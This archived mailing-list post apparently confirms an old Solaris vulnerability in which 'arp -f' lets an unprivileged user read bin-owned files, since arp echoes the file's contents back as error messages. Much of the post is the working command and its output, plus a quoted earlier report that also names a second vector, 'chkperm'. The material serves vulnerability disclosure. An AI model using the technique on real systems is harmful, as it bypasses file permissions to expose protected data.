Arp bug Verified for my Solaris 5.6 and 5.5.1 Installs. $ uname -a SunOS pangea 5.5.1 Generic_103640-26 sun4u sparc SUNW,Ultra-5_10 # uname -a SunOS vapid 5.6 Generic_105181-05 sun4u sparc SUNW,Ultra-5_10 # $ ls -l /etc/bin -rw-rw---- 1 bin bin 23 Dec 1 13:54 /etc/bin On both machines I could read bin:bin owned files as a regular joe user with arp -f. bash-2.00$ /usr/sbin/arp -f /etc/bin arp: ze: unknown host arp: ze: unknown host arp: zeperliz: unknown host arp: zeperliz: unknown host arp: zeperliz: unknown host arp: zeperliz: unknown host arp: zeperliz: unknown host arp: ze: unknown host arp: zeperl: unknown host arp: bad line: zeperlizinzeliver As you can see arp will only print until the first white space or newline. # cat /etc/bin ze perl iz in ze liver ze perl iz in ze liver zeperliz in ze liver zeperliz in ze liver zeperliz in ze liver zeperliz in ze liver zeperliz in ze liver ze perl iz in ze liver zeperl iz in ze liver zeperlizinzeliver zeperl iz in ze liver ze perl iz in ze liver Brock wrote: > > Greetings, > > OVERVIEW > /usr/vmsys/bin/chkperm and /usr/sbin/arp can be used to read bin-owned files. > > BACKGROUND > All my testing was done on Solaris 2.7 and 2.6 SPARC edition. > > > Vuln #2 - arp > > Just as the first, you may read any bin owned files: > bash-2.02$ ls -la /etc/bin > -rw-rw---- 1 bin bin 45 Nov 15 16:44 /etc/bin > bash-2.02$ cat /etc/bin > cat: cannot open /etc/bin > bash-2.02$ /usr/sbin/arp -f /etc/bin > arp: bad line: seekret1 > > arp: bad line: seekret2 > > arp: bad line: seekret3 > > arp: bad line: seekret4 > > arp: bad line: seekret5 > Larry W. Cashdollar R2D2 r00t3d the death star. http://vapid.dhs.org
This archive was generated by hypermail 2b30 : Fri Apr 13 2001 - 15:16:27 PDT